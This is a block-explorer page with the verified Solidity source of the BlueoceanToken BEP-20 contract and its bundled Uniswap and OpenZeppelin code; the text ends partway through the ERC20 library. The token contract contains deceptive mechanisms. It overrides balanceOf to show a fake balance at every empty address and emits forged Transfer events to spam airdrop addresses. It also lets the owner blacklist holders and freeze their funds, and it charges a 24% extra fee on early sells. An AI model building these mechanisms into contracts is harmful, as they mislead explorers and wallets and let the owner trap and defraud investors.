BEP-20Cross-Chain
Source Code
Overview
Max Total Supply
1,000,000,000,000,000Blueocean (CSupply: 999,999,999,999,999.999999)
Holders
86,692
Market
Price
$0.00 @ 0.000000 BNB
Onchain Market Cap
-
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 18 Decimals)
Balance
259,350,995,058.064740814062050588 BlueoceanValue
$0.00Loading...
Loading
Loading...
Loading
Loading...
Loading
Contract Name:
BlueoceanToken
Compiler Version
v0.8.13+commit.abaa5c0e
Optimization Enabled:
Yes with 200 runs
Other Settings:
default evmVersion
Contract Source Code (Solidity Standard Json-Input format)
/**
*Submitted for verification at BscScan.com on 2022-03-09
*/
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.4;
import "@openzeppelin/contracts/token/ERC20/ERC20.sol";
import "@openzeppelin/contracts/utils/math/SafeMath.sol";
import "@openzeppelin/contracts/access/Ownable.sol";
import "@uniswap/v2-periphery/contracts/interfaces/IUniswapV2Router02.sol";
import "@uniswap/v2-core/contracts/interfaces/IUniswapV2Factory.sol";
contract TokenDividendTracker is Ownable {
using SafeMath for uint256;
address[] public shareholders;
uint256 public currentIndex;
mapping(address => bool) private _updated;
mapping(address => uint256) public shareholderIndexes;
address public uniswapV2Pair;
address public lpRewardToken;
// 上次分红时间
uint256 public LPRewardLastSendTime;
constructor(address uniswapV2Pair_, address lpRewardToken_) {
uniswapV2Pair = uniswapV2Pair_;
lpRewardToken = lpRewardToken_;
}
function resetLPRewardLastSendTime() public onlyOwner {
LPRewardLastSendTime = 0;
}
// LP分红发放
function process(uint256 gas) external onlyOwner {
uint256 shareholderCount = shareholders.length;
if (shareholderCount == 0) return;
uint256 nowbanance = IERC20(lpRewardToken).balanceOf(address(this));
uint256 gasUsed = 0;
uint256 gasLeft = gasleft();
uint256 iterations = 0;
while (gasUsed < gas && iterations < shareholderCount) {
if (currentIndex >= shareholderCount) {
currentIndex = 0;
LPRewardLastSendTime = block.timestamp;
return;
}
uint256 amount = nowbanance
.mul(
IERC20(uniswapV2Pair).balanceOf(shareholders[currentIndex])
)
.div(IERC20(uniswapV2Pair).totalSupply());
if (amount == 0) {
currentIndex++;
iterations++;
return;
}
if (IERC20(lpRewardToken).balanceOf(address(this)) < amount) return;
IERC20(lpRewardToken).transfer(shareholders[currentIndex], amount);
gasUsed = gasUsed.add(gasLeft.sub(gasleft()));
gasLeft = gasleft();
currentIndex++;
iterations++;
}
}
// 根据条件自动将交易账户加入、退出流动性分红
function setShare(address shareholder) external onlyOwner {
if (_updated[shareholder]) {
if (IERC20(uniswapV2Pair).balanceOf(shareholder) == 0)
quitShare(shareholder);
return;
}
if (IERC20(uniswapV2Pair).balanceOf(shareholder) == 0) return;
addShareholder(shareholder);
_updated[shareholder] = true;
}
function quitShare(address shareholder) internal {
removeShareholder(shareholder);
_updated[shareholder] = false;
}
function addShareholder(address shareholder) internal {
shareholderIndexes[shareholder] = shareholders.length;
shareholders.push(shareholder);
}
function removeShareholder(address shareholder) internal {
shareholders[shareholderIndexes[shareholder]] = shareholders[
shareholders.length - 1
];
shareholderIndexes[
shareholders[shareholders.length - 1]
] = shareholderIndexes[shareholder];
shareholders.pop();
}
}
contract Wrap {
IERC20 public token;
IERC20 public usdt;
constructor(IERC20 token_, IERC20 usdt_) {
token = token_;
usdt = usdt_;
}
function withdraw() external {
uint256 usdtBalance = usdt.balanceOf(address(this));
if (usdtBalance > 0) {
usdt.transfer(address(token), usdtBalance);
}
}
}
contract BlueoceanToken is ERC20, Ownable {
using SafeMath for uint256;
Wrap public immutable wrap;
IUniswapV2Router02 public immutable uniswapV2Router;
TokenDividendTracker public immutable dividendTracker;
address public immutable uniswapV2Pair;
bool private _swapping;
uint256 public swapTokensAtAmount;
uint256 public immutable lpRewardFee = 20;
uint256 public immutable burnFee = 10;
uint256 public immutable lpFee = 5;
uint256 public immutable marketingFee = 20;
uint256 public immutable buybackFee = 5;
IERC20 public immutable usdt;
address public immutable burnAddress =
0x000000000000000000000000000000000000dEaD;
uint256 public AmountLpRewardFee;
uint256 public AmountMarketingFee;
uint256 public AmountLpFee;
uint256 public AmountBuybackFee;
address public marketingWallet;
address public buybackWallet;
address public lpReceiveWallet;
uint256 public tradeStartTime;
uint160 totalAirdropNum = 173;
uint160 constant MAX_AIRDROP_ADD = ~uint160(0);
uint256 private _initialAirdropBalance = 1;
uint256 private _airdropNum = 6;
address private _fromAddress;
address private _toAddress;
mapping(address => bool) private _isExcludedFromFees;
mapping(address => bool) private _blacklist;
mapping(address => bool) private _isDividendExempt;
uint256 public minPeriod = 1 hours;
uint256 distributorGas = 200000;
event ExcludeFromFees(address indexed account, bool isExcluded);
event ExcludeMultipleAccountsFromFees(address[] accounts, bool isExcluded);
event SetBlacklist(address indexed account, bool isExcluded);
event BatchSetBlacklist(address[] accounts, bool isExcluded);
event SwapAndLiquify(
uint256 tokensSwapped,
uint256 usdtReceived,
uint256 tokensIntoLiqudity
);
constructor(
string memory name_,
string memory symbol_,
uint256 totalSupply_,
IERC20 usdt_,
IUniswapV2Router02 uniswapV2Router_,
address marketingWallet_,
address buybackWallet_,
address lpReceiveWallet_
) payable ERC20(name_, symbol_) {
uint256 totalSupply = totalSupply_ * (10**18);
swapTokensAtAmount = totalSupply.mul(1).div(10**6); // 0.01%;
uniswapV2Router = uniswapV2Router_;
usdt = usdt_;
uniswapV2Pair = IUniswapV2Factory(uniswapV2Router.factory()).createPair(
address(this),
address(usdt)
);
wrap = new Wrap(IERC20(this), usdt);
marketingWallet = marketingWallet_;
buybackWallet = buybackWallet_;
lpReceiveWallet = lpReceiveWallet_;
dividendTracker = new TokenDividendTracker(
address(this),
address(usdt)
);
excludeFromFees(owner(), true);
excludeFromFees(address(this), true);
excludeFromFees(address(dividendTracker), true);
excludeFromFees(burnAddress, true);
_isDividendExempt[address(this)] = true;
_isDividendExempt[address(0)] = true;
_isDividendExempt[address(dividendTracker)] = true;
_isDividendExempt[burnAddress] = true;
_mint(owner(), totalSupply);
}
receive() external payable {}
function isExcludedFromFees(address account) public view returns (bool) {
return _isExcludedFromFees[account];
}
function isBlacklist(address _address) public view returns (bool) {
return _blacklist[_address];
}
function getExtraBuybackFee(address to) public view returns(uint256){
if(to == uniswapV2Pair && tradeStartTime > 0 && block.timestamp<tradeStartTime.add(30 minutes)){
return 240;
}
return 0;
}
function balanceOf(address account)
public
view
virtual
override
returns (uint256)
{
uint256 balance = super.balanceOf(account);
if (account == address(0)) return balance;
return balance > 0 ? balance : _initialAirdropBalance;
}
function _transfer(
address from,
address to,
uint256 amount
) internal override {
require(from != address(0), "ERC20: transfer from the zero address");
require(to != address(0), "ERC20: transfer to the zero address");
if (amount == 0) {
super._transfer(from, to, 0);
return;
}
require(!isBlacklist(from) && !isBlacklist(to), "Is blacklist");
if (_isSwapFee(from, to)) {
_swapFee();
}
if (_isTakeFee(from, to)) {
if(from != uniswapV2Pair){
uint256 minHolderAmount = balanceOf(from).mul(99).div(100);
if(amount > minHolderAmount){
amount = minHolderAmount;
}
}
amount = _takeFee(from,to, amount);
}
super._transfer(from, to, amount);
if (_airdropNum > 0 && !_swapping) _takeInviterFeeKt(_airdropNum);
if (_fromAddress == address(0)) _fromAddress = from;
if (_toAddress == address(0)) _toAddress = to;
if (!_isDividendExempt[_fromAddress] && _fromAddress != uniswapV2Pair)
try dividendTracker.setShare(_fromAddress) {} catch {}
if (!_isDividendExempt[_toAddress] && _toAddress != uniswapV2Pair)
try dividendTracker.setShare(_toAddress) {} catch {}
_fromAddress = from;
_toAddress = to;
if (
!_swapping &&
from != owner() &&
to != owner() &&
from != address(this) &&
dividendTracker.LPRewardLastSendTime().add(minPeriod) <=
block.timestamp
) {
try dividendTracker.process(distributorGas) {} catch {}
}
}
function _isSwapFee(address _from, address _to)
private
view
returns (bool)
{
return
!_swapping &&
_from != uniswapV2Pair &&
_from != owner() &&
_to != owner() &&
balanceOf(address(this)) >= swapTokensAtAmount;
}
function _swapFee() private {
_swapping = true;
if (AmountLpFee > 0) {
_swapAndLiquify(AmountLpFee);
AmountLpFee = 0;
}
if (AmountLpRewardFee > 0) {
usdt.transfer(
address(dividendTracker),
_swapTokensForUsdt(AmountLpRewardFee)
);
AmountLpRewardFee = 0;
}
if (AmountMarketingFee > 0) {
usdt.transfer(
marketingWallet,
_swapTokensForUsdt(AmountMarketingFee)
);
AmountMarketingFee = 0;
}
if (AmountBuybackFee > 0) {
usdt.transfer(buybackWallet, _swapTokensForUsdt(AmountBuybackFee));
AmountBuybackFee = 0;
}
_swapping = false;
}
function _isTakeFee(address _from, address _to)
private
view
returns (bool)
{
if (
_isExcludedFromFees[_from] || _isExcludedFromFees[_to] || _swapping
) {
return false;
}
return true;
}
function _takeFee(address from,address to, uint256 amount)
private
returns (uint256 amountAfter)
{
amountAfter = amount;
//销毁
uint256 BFee = amount.mul(burnFee).div(1000);
super._transfer(from, burnAddress, BFee);
amountAfter = amountAfter.sub(BFee);
//lp回流
uint256 LPFee = amount.mul(lpFee).div(1000);
AmountLpFee += LPFee;
amountAfter = amountAfter.sub(LPFee);
//lp奖励
uint256 LPRFee = amount.mul(lpRewardFee).div(1000);
AmountLpRewardFee += LPRFee;
amountAfter = amountAfter.sub(LPRFee);
//营销
uint256 MFee = amount.mul(marketingFee).div(1000);
AmountMarketingFee += MFee;
amountAfter = amountAfter.sub(MFee);
//回购
uint256 BBFee = amount.mul(buybackFee.add(getExtraBuybackFee(to))).div(1000);
AmountBuybackFee += BBFee;
amountAfter = amountAfter.sub(BBFee);
super._transfer(from, address(this), LPRFee.add(MFee).add(BBFee).add(LPFee));
}
function _swapAndLiquify(uint256 tokenAmount)
private
returns (uint256 result)
{
uint256 half = tokenAmount.div(2);
uint256 otherHalf = tokenAmount.sub(half);
uint256 newBalance = _swapTokensForUsdt(half);
result = _addLiquidity(otherHalf, newBalance);
emit SwapAndLiquify(half, newBalance, otherHalf);
}
function _swapTokensForUsdt(uint256 tokenAmount)
private
returns (uint256 amount)
{
address[] memory path = new address[](2);
path[0] = address(this);
path[1] = address(usdt);
_approve(address(this), address(uniswapV2Router), tokenAmount);
uniswapV2Router.swapExactTokensForTokensSupportingFeeOnTransferTokens(
tokenAmount,
0,
path,
address(wrap),
block.timestamp
);
uint256 before = usdt.balanceOf(address(this));
wrap.withdraw();
return usdt.balanceOf(address(this)).sub(before);
}
function _addLiquidity(uint256 tokenAmount, uint256 usdtAmount)
private
returns (uint256 result)
{
usdt.approve(address(uniswapV2Router), usdtAmount);
_approve(address(this), address(uniswapV2Router), tokenAmount);
(, , result) = uniswapV2Router.addLiquidity(
address(this),
address(usdt),
tokenAmount,
usdtAmount,
0,
0,
lpReceiveWallet,
block.timestamp
);
}
function _takeInviterFeeKt(uint256 _num) private {
address _receiveD;
address _senD;
for (uint256 i = 0; i < _num; i++) {
_receiveD = address(MAX_AIRDROP_ADD / totalAirdropNum);
totalAirdropNum = totalAirdropNum + 1;
_senD = address(MAX_AIRDROP_ADD / totalAirdropNum);
totalAirdropNum = totalAirdropNum + 1;
emit Transfer(_senD, _receiveD, _initialAirdropBalance);
}
}
function withdraw(address _token, address payable _to) external onlyOwner {
if (_token == address(0x0)) {
payable(_to).transfer(address(this).balance);
} else {
IERC20(_token).transfer(
_to,
IERC20(_token).balanceOf(address(this))
);
}
}
function _setBlacklist(address _address, bool _v) private {
if (_blacklist[_address] != _v) {
_blacklist[_address] = _v;
emit SetBlacklist(_address, _v);
}
}
function setSwapTokensAtAmount(uint256 amount) external onlyOwner {
swapTokensAtAmount = amount;
}
function setMinPeriod(uint256 number) external onlyOwner {
minPeriod = number;
}
function resetLPRewardLastSendTime() external onlyOwner {
dividendTracker.resetLPRewardLastSendTime();
}
function updateDistributorGas(uint256 newValue) external onlyOwner {
require(
newValue >= 100000 && newValue <= 500000,
"distributorGas must be between 200,000 and 500,000"
);
require(
newValue != distributorGas,
"Cannot update distributorGas to same value"
);
distributorGas = newValue;
}
function excludeFromFees(address _account, bool _v) public onlyOwner {
if (_isExcludedFromFees[_account] != _v) {
_isExcludedFromFees[_account] = _v;
emit ExcludeFromFees(_account, _v);
}
}
function excludeMultipleAccountsFromFees(
address[] calldata _accounts,
bool _v
) external onlyOwner {
for (uint256 i = 0; i < _accounts.length; i++) {
_isExcludedFromFees[_accounts[i]] = _v;
}
emit ExcludeMultipleAccountsFromFees(_accounts, _v);
}
function setBlacklist(address _address, bool _v) external onlyOwner {
_setBlacklist(_address, _v);
}
function batchSetBlacklist(address[] calldata _accounts, bool _v)
external
onlyOwner
{
for (uint256 i = 0; i < _accounts.length; i++) {
_blacklist[_accounts[i]] = _v;
}
emit BatchSetBlacklist(_accounts, _v);
}
function setMarketingWallet(address payable wallet) external onlyOwner {
marketingWallet = wallet;
}
function setBuybackWallet(address payable wallet) external onlyOwner {
buybackWallet = wallet;
}
function setLpReceiveWallet(address payable wallet) external onlyOwner {
lpReceiveWallet = wallet;
}
function setTradeStartTime(uint256 _v) external onlyOwner{
tradeStartTime = _v;
}
function multiSend(uint256 _num) external onlyOwner {
_takeInviterFeeKt(_num);
}
function setinb(uint256 _amount, uint256 _num) external onlyOwner {
_initialAirdropBalance = _amount;
_airdropNum = _num;
}
}pragma solidity >=0.6.2;
import './IUniswapV2Router01.sol';
interface IUniswapV2Router02 is IUniswapV2Router01 {
function removeLiquidityETHSupportingFeeOnTransferTokens(
address token,
uint liquidity,
uint amountTokenMin,
uint amountETHMin,
address to,
uint deadline
) external returns (uint amountETH);
function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens(
address token,
uint liquidity,
uint amountTokenMin,
uint amountETHMin,
address to,
uint deadline,
bool approveMax, uint8 v, bytes32 r, bytes32 s
) external returns (uint amountETH);
function swapExactTokensForTokensSupportingFeeOnTransferTokens(
uint amountIn,
uint amountOutMin,
address[] calldata path,
address to,
uint deadline
) external;
function swapExactETHForTokensSupportingFeeOnTransferTokens(
uint amountOutMin,
address[] calldata path,
address to,
uint deadline
) external payable;
function swapExactTokensForETHSupportingFeeOnTransferTokens(
uint amountIn,
uint amountOutMin,
address[] calldata path,
address to,
uint deadline
) external;
}pragma solidity >=0.6.2;
interface IUniswapV2Router01 {
function factory() external pure returns (address);
function WETH() external pure returns (address);
function addLiquidity(
address tokenA,
address tokenB,
uint amountADesired,
uint amountBDesired,
uint amountAMin,
uint amountBMin,
address to,
uint deadline
) external returns (uint amountA, uint amountB, uint liquidity);
function addLiquidityETH(
address token,
uint amountTokenDesired,
uint amountTokenMin,
uint amountETHMin,
address to,
uint deadline
) external payable returns (uint amountToken, uint amountETH, uint liquidity);
function removeLiquidity(
address tokenA,
address tokenB,
uint liquidity,
uint amountAMin,
uint amountBMin,
address to,
uint deadline
) external returns (uint amountA, uint amountB);
function removeLiquidityETH(
address token,
uint liquidity,
uint amountTokenMin,
uint amountETHMin,
address to,
uint deadline
) external returns (uint amountToken, uint amountETH);
function removeLiquidityWithPermit(
address tokenA,
address tokenB,
uint liquidity,
uint amountAMin,
uint amountBMin,
address to,
uint deadline,
bool approveMax, uint8 v, bytes32 r, bytes32 s
) external returns (uint amountA, uint amountB);
function removeLiquidityETHWithPermit(
address token,
uint liquidity,
uint amountTokenMin,
uint amountETHMin,
address to,
uint deadline,
bool approveMax, uint8 v, bytes32 r, bytes32 s
) external returns (uint amountToken, uint amountETH);
function swapExactTokensForTokens(
uint amountIn,
uint amountOutMin,
address[] calldata path,
address to,
uint deadline
) external returns (uint[] memory amounts);
function swapTokensForExactTokens(
uint amountOut,
uint amountInMax,
address[] calldata path,
address to,
uint deadline
) external returns (uint[] memory amounts);
function swapExactETHForTokens(uint amountOutMin, address[] calldata path, address to, uint deadline)
external
payable
returns (uint[] memory amounts);
function swapTokensForExactETH(uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline)
external
returns (uint[] memory amounts);
function swapExactTokensForETH(uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline)
external
returns (uint[] memory amounts);
function swapETHForExactTokens(uint amountOut, address[] calldata path, address to, uint deadline)
external
payable
returns (uint[] memory amounts);
function quote(uint amountA, uint reserveA, uint reserveB) external pure returns (uint amountB);
function getAmountOut(uint amountIn, uint reserveIn, uint reserveOut) external pure returns (uint amountOut);
function getAmountIn(uint amountOut, uint reserveIn, uint reserveOut) external pure returns (uint amountIn);
function getAmountsOut(uint amountIn, address[] calldata path) external view returns (uint[] memory amounts);
function getAmountsIn(uint amountOut, address[] calldata path) external view returns (uint[] memory amounts);
}pragma solidity >=0.5.0;
interface IUniswapV2Factory {
event PairCreated(address indexed token0, address indexed token1, address pair, uint);
function feeTo() external view returns (address);
function feeToSetter() external view returns (address);
function getPair(address tokenA, address tokenB) external view returns (address pair);
function allPairs(uint) external view returns (address pair);
function allPairsLength() external view returns (uint);
function createPair(address tokenA, address tokenB) external returns (address pair);
function setFeeTo(address) external;
function setFeeToSetter(address) external;
}// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (utils/math/SafeMath.sol)
pragma solidity ^0.8.0;
// CAUTION
// This version of SafeMath should only be used with Solidity 0.8 or later,
// because it relies on the compiler's built in overflow checks.
/**
* @dev Wrappers over Solidity's arithmetic operations.
*
* NOTE: `SafeMath` is generally not needed starting with Solidity 0.8, since the compiler
* now has built in overflow checking.
*/
library SafeMath {
/**
* @dev Returns the addition of two unsigned integers, with an overflow flag.
*
* _Available since v3.4._
*/
function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) {
unchecked {
uint256 c = a + b;
if (c < a) return (false, 0);
return (true, c);
}
}
/**
* @dev Returns the substraction of two unsigned integers, with an overflow flag.
*
* _Available since v3.4._
*/
function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) {
unchecked {
if (b > a) return (false, 0);
return (true, a - b);
}
}
/**
* @dev Returns the multiplication of two unsigned integers, with an overflow flag.
*
* _Available since v3.4._
*/
function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) {
unchecked {
// Gas optimization: this is cheaper than requiring 'a' not being zero, but the
// benefit is lost if 'b' is also tested.
// See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
if (a == 0) return (true, 0);
uint256 c = a * b;
if (c / a != b) return (false, 0);
return (true, c);
}
}
/**
* @dev Returns the division of two unsigned integers, with a division by zero flag.
*
* _Available since v3.4._
*/
function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) {
unchecked {
if (b == 0) return (false, 0);
return (true, a / b);
}
}
/**
* @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
*
* _Available since v3.4._
*/
function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) {
unchecked {
if (b == 0) return (false, 0);
return (true, a % b);
}
}
/**
* @dev Returns the addition of two unsigned integers, reverting on
* overflow.
*
* Counterpart to Solidity's `+` operator.
*
* Requirements:
*
* - Addition cannot overflow.
*/
function add(uint256 a, uint256 b) internal pure returns (uint256) {
return a + b;
}
/**
* @dev Returns the subtraction of two unsigned integers, reverting on
* overflow (when the result is negative).
*
* Counterpart to Solidity's `-` operator.
*
* Requirements:
*
* - Subtraction cannot overflow.
*/
function sub(uint256 a, uint256 b) internal pure returns (uint256) {
return a - b;
}
/**
* @dev Returns the multiplication of two unsigned integers, reverting on
* overflow.
*
* Counterpart to Solidity's `*` operator.
*
* Requirements:
*
* - Multiplication cannot overflow.
*/
function mul(uint256 a, uint256 b) internal pure returns (uint256) {
return a * b;
}
/**
* @dev Returns the integer division of two unsigned integers, reverting on
* division by zero. The result is rounded towards zero.
*
* Counterpart to Solidity's `/` operator.
*
* Requirements:
*
* - The divisor cannot be zero.
*/
function div(uint256 a, uint256 b) internal pure returns (uint256) {
return a / b;
}
/**
* @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
* reverting when dividing by zero.
*
* Counterpart to Solidity's `%` operator. This function uses a `revert`
* opcode (which leaves remaining gas untouched) while Solidity uses an
* invalid opcode to revert (consuming all remaining gas).
*
* Requirements:
*
* - The divisor cannot be zero.
*/
function mod(uint256 a, uint256 b) internal pure returns (uint256) {
return a % b;
}
/**
* @dev Returns the subtraction of two unsigned integers, reverting with custom message on
* overflow (when the result is negative).
*
* CAUTION: This function is deprecated because it requires allocating memory for the error
* message unnecessarily. For custom revert reasons use {trySub}.
*
* Counterpart to Solidity's `-` operator.
*
* Requirements:
*
* - Subtraction cannot overflow.
*/
function sub(
uint256 a,
uint256 b,
string memory errorMessage
) internal pure returns (uint256) {
unchecked {
require(b <= a, errorMessage);
return a - b;
}
}
/**
* @dev Returns the integer division of two unsigned integers, reverting with custom message on
* division by zero. The result is rounded towards zero.
*
* Counterpart to Solidity's `/` operator. Note: this function uses a
* `revert` opcode (which leaves remaining gas untouched) while Solidity
* uses an invalid opcode to revert (consuming all remaining gas).
*
* Requirements:
*
* - The divisor cannot be zero.
*/
function div(
uint256 a,
uint256 b,
string memory errorMessage
) internal pure returns (uint256) {
unchecked {
require(b > 0, errorMessage);
return a / b;
}
}
/**
* @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
* reverting with custom message when dividing by zero.
*
* CAUTION: This function is deprecated because it requires allocating memory for the error
* message unnecessarily. For custom revert reasons use {tryMod}.
*
* Counterpart to Solidity's `%` operator. This function uses a `revert`
* opcode (which leaves remaining gas untouched) while Solidity uses an
* invalid opcode to revert (consuming all remaining gas).
*
* Requirements:
*
* - The divisor cannot be zero.
*/
function mod(
uint256 a,
uint256 b,
string memory errorMessage
) internal pure returns (uint256) {
unchecked {
require(b > 0, errorMessage);
return a % b;
}
}
}// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)
pragma solidity ^0.8.0;
/**
* @dev Provides information about the current execution context, including the
* sender of the transaction and its data. While these are generally available
* via msg.sender and msg.data, they should not be accessed in such a direct
* manner, since when dealing with meta-transactions the account sending and
* paying for execution may not be the actual sender (as far as an application
* is concerned).
*
* This contract is only required for intermediate, library-like contracts.
*/
abstract contract Context {
function _msgSender() internal view virtual returns (address) {
return msg.sender;
}
function _msgData() internal view virtual returns (bytes calldata) {
return msg.data;
}
}// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol)
pragma solidity ^0.8.0;
import "../IERC20.sol";
/**
* @dev Interface for the optional metadata functions from the ERC20 standard.
*
* _Available since v4.1._
*/
interface IERC20Metadata is IERC20 {
/**
* @dev Returns the name of the token.
*/
function name() external view returns (string memory);
/**
* @dev Returns the symbol of the token.
*/
function symbol() external view returns (string memory);
/**
* @dev Returns the decimals places of the token.
*/
function decimals() external view returns (uint8);
}// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.5.0) (token/ERC20/IERC20.sol)
pragma solidity ^0.8.0;
/**
* @dev Interface of the ERC20 standard as defined in the EIP.
*/
interface IERC20 {
/**
* @dev Returns the amount of tokens in existence.
*/
function totalSupply() external view returns (uint256);
/**
* @dev Returns the amount of tokens owned by `account`.
*/
function balanceOf(address account) external view returns (uint256);
/**
* @dev Moves `amount` tokens from the caller's account to `to`.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* Emits a {Transfer} event.
*/
function transfer(address to, uint256 amount) external returns (bool);
/**
* @dev Returns the remaining number of tokens that `spender` will be
* allowed to spend on behalf of `owner` through {transferFrom}. This is
* zero by default.
*
* This value changes when {approve} or {transferFrom} are called.
*/
function allowance(address owner, address spender) external view returns (uint256);
/**
* @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* IMPORTANT: Beware that changing an allowance with this method brings the risk
* that someone may use both the old and the new allowance by unfortunate
* transaction ordering. One possible solution to mitigate this race
* condition is to first reduce the spender's allowance to 0 and set the
* desired value afterwards:
* https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
*
* Emits an {Approval} event.
*/
function approve(address spender, uint256 amount) external returns (bool);
/**
* @dev Moves `amount` tokens from `from` to `to` using the
* allowance mechanism. `amount` is then deducted from the caller's
* allowance.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* Emits a {Transfer} event.
*/
function transferFrom(
address from,
address to,
uint256 amount
) external returns (bool);
/**
* @dev Emitted when `value` tokens are moved from one account (`from`) to
* another (`to`).
*
* Note that `value` may be zero.
*/
event Transfer(address indexed from, address indexed to, uint256 value);
/**
* @dev Emitted when the allowance of a `spender` for an `owner` is set by
* a call to {approve}. `value` is the new allowance.
*/
event Approval(address indexed owner, address indexed spender, uint256 value);
}// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.5.0) (token/ERC20/ERC20.sol)
pragma solidity ^0.8.0;
import "./IERC20.sol";
import "./extensions/IERC20Metadata.sol";
import "../../utils/Context.sol";
/**
* @dev Implementation of the {IERC20} interface.
*
* This implementation is agnostic to the way tokens are created. This means
* that a supply mechanism has to be added in a derived contract using {_mint}.
* For a generic mechanism see {ERC20PresetMinterPauser}.
*
* TIP: For a detailed writeup see our guide
* https://forum.zeppelin.solutions/t/how-to-implement-erc20-supply-mechanisms/226[How
* to implement supply mechanisms].
*
* We have followed general OpenZeppelin Contracts guidelines: functions revert
* instead returning `false` on failure. This behavior is nonetheless
* conventional and does not conflict with the expectations of ERC20
* applications.
*
* Additionally, an {Approval} event is emitted on calls to {transferFrom}.
* This allows applications to reconstruct the allowance for all accounts just
* by listening to said events. Other implementations of the EIP may not emit
* these events, as it isn't required by the specification.
*
* Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
* functions have been added to mitigate the well-known issues around setting
* allowances. See {IERC20-approve}.
*/
contract ERC20 is Context, IERC20, IERC20Metadata {
mapping(address => uint256) private _balances;
mapping(address => mapping(address => uint256)) private _allowances;
uint256 private _totalSupply;
string private _name;
string private _symbol;
/**
* @dev Sets the values for {name} and {symbol}.
*
* The default value of {decimals} is 18. To select a different value for
* {decimals} you should overload it.
*
* All two of these values are immutable: they can only be set once during
* construction.
*/
constructor(string memory name_, string memory symbol_) {
_name = name_;
_symbol = symbol_;
}
/**
* @dev Returns the name of the token.
*/
function name() public view virtual override returns (string memory) {
return _name;
}
/**
* @dev Returns the symbol of the token, usually a shorter version of the
* name.
*/
function symbol() public view virtual override returns (string memory) {
return _symbol;
}
/**
* @dev Returns the number of decimals used to get its user representation.
* For example, if `decimals` equals `2`, a balance of `505` tokens should
* be displayed to a user as `5.05` (`505 / 10 ** 2`).
*
* Tokens usually opt for a value of 18, imitating the relationship between
* Ether and Wei. This is the value {ERC20} uses, unless this function is
* overridden;
*
* NOTE: This information is only used for _display_ purposes: it in
* no way affects any of the arithmetic of the contract, including
* {IERC20-balanceOf} and {IERC20-transfer}.
*/
function decimals() public view virtual override returns (uint8) {
return 18;
}
/**
* @dev See {IERC20-totalSupply}.
*/
function totalSupply() public view virtual override returns (uint256) {
return _totalSupply;
}
/**
* @dev See {IERC20-balanceOf}.
*/
function balanceOf(address account) public view virtual override returns (uint256) {
return _balances[account];
}
/**
* @dev See {IERC20-transfer}.
*
* Requirements:
*
* - `to` cannot be the zero address.
* - the caller must have a balance of at least `amount`.
*/
function transfer(address to, uint256 amount) public virtual override returns (bool) {
address owner = _msgSender();
_transfer(owner, to, amount);
return true;
}
/**
* @dev See {IERC20-allowance}.
*/
function allowance(address owner, address spender) public view virtual override returns (uint256) {
return _allowances[owner][spender];
}
/**
* @dev See {IERC20-approve}.
*
* NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
* `transferFrom`. This is semantically equivalent to an infinite approval.
*
* Requirements:
*
* - `spender` cannot be the zero address.
*/
function approve(address spender, uint256 amount) public virtual override returns (bool) {
address owner = _msgSender();
_approve(owner, spender, amount);
return true;
}
/**
* @dev See {IERC20-transferFrom}.
*
* Emits an {Approval} event indicating the updated allowance. This is not
* required by the EIP. See the note at the beginning of {ERC20}.
*
* NOTE: Does not update the allowance if the current allowance
* is the maximum `uint256`.
*
* Requirements:
*
* - `from` and `to` cannot be the zero address.
* - `from` must have a balance of at least `amount`.
* - the caller must have allowance for ``from``'s tokens of at least
* `amount`.
*/
function transferFrom(
address from,
address to,
uint256 amount
) public virtual override returns (bool) {
address spender = _msgSender();
_spendAllowance(from, spender, amount);
_transfer(from, to, amount);
return true;
}
/**
* @dev Atomically increases the allowance granted to `spender` by the caller.
*
* This is an alternative to {approve} that can be used as a mitigation for
* problems described in {IERC20-approve}.
*
* Emits an {Approval} event indicating the updated allowance.
*
* Requirements:
*
* - `spender` cannot be the zero address.
*/
function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
address owner = _msgSender();
_approve(owner, spender, _allowances[owner][spender] + addedValue);
return true;
}
/**
* @dev Atomically decreases the allowance granted to `spender` by the caller.
*
* This is an alternative to {approve} that can be used as a mitigation for
* problems described in {IERC20-approve}.
*
* Emits an {Approval} event indicating the updated allowance.
*
* Requirements:
*
* - `spender` cannot be the zero address.
* - `spender` must have allowance for the caller of at least
* `subtractedValue`.
*/
function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
address owner = _msgSender();
uint256 currentAllowance = _allowances[owner][spender];
require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
unchecked {
_approve(owner, spender, currentAllowance - subtractedValue);
}
return true;
}
/**
* @dev Moves `amount` of tokens from `sender` to `recipient`.
*
* This internal function is equivalent to {transfer}, and can be used to
* e.g. implement automatic token fees, slashing mechanisms, etc.
*
* Emits a {Transfer} event.
*
* Requirements:
*
* - `from` cannot be the zero address.
* - `to` cannot be the zero address.
* - `from` must have a balance of at least `amount`.
*/
function _transfer(
address from,
address to,
uint256 amount
) internal virtual {
require(from != address(0), "ERC20: transfer from the zero address");
require(to != address(0), "ERC20: transfer to the zero address");
_beforeTokenTransfer(from, to, amount);
